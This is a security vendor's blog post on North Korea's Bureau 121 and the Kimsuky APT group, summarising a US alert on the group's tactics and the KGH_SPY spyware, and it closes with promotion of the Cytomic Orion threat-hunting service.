The Reconnaissance Bureau of the General Staff (RBG) is the intelligence organization responsible for some of North Korea’s more clandestine activities. Its mission includes activities such as cyber espionage and cyber warfare and it is responsible for the infamous Bureau 121. This agency is practically a legend among the cybersecurity community. It first came to light in December 2014, when it launched a cyberattack on the systems of Sony Pictures during the release of the movie The Interview, a comedy set in North Korea and parodying leader Kim Jong-Un.

Moreover, in July this year, the US Army released a report entitled North Korean Tactics. One section of this report looked specifically at electronic warfare (EW) and described Bureau 121. The report estimates that the agency has some 6,000 members, with most of them operating outside North Korea, in places such as Russia, Belarus, and China. This is down to the fact that the country itself does not have an IT infrastructure capable of carrying out large-scale attacks, mainly due to international sanctions that hinder attempts to import electronic components and systems. Nevertheless, the report underlines the agency’s high level of development and indicates that it has been able to infiltrate secure systems and steal South Korean military secrets. In addition, it coordinates several APT groups more or less directly.

APT group with a new spyware tool_

One such APT group is Kimsuky. Towards the end of October, US security agencies posted an alert describing its tactics, techniques, and procedures (TTPs). The main findings were:

  • The group has been active since 2012.
  • The North Korean regime has commissioned intelligence and cyber espionage missions against both individuals and organizations, many located in South Korea, Japan, and the USA.
  • Intelligence gathering activities focus on foreign policy and national security issues related to the Korean Peninsula, nuclear policies, and sanctions.
  • It usually targets people and think tanks identified as experts in areas such as atomic energy, international relations as well as defense and security.
  • Techniques used include social engineering, spear phishing, and water holes.

To make matters worse, other cybersecurity analysts have revealed that the group has recently gained new capabilities with a tool called KGH_SPY. This multi-component spyware package collects sensitive data, spies on users, executes commands, and installs backdoors. It can also collect data from browsers, Windows Credential Manager, WINSCP, and email clients. More concerning still is that according to analysts, common antivirus solutions don’t detect it.

Threat hunting against LOTL_

Malware such as KGH_SPY, developed by state-sponsored APT groups, are often highly sophisticated and use Living Off The Land (LOTL) techniques. For this reason, as analysts have demonstrated, traditional cybersecurity solutions have not been able to detect it.

When it comes to threats like these, CISOs across private and governmental organizations must have advanced solutions that include service for threat hunting and investigation of attacks such as LOTLs, in order to provide a rapid response.

Cytomic Orion standardizes these processes. Our cloud solution helps analysts rapidly correlate events, test hypotheses, and minimize investigation, detection, and response times. Analysts therefore are supported at all stages of triage, investigation, and immediate response and will be better prepared to identify and respond to the complex threats that organizations such as Kimsuky and Bureau 121 have clearly indicated that they are capable of executing.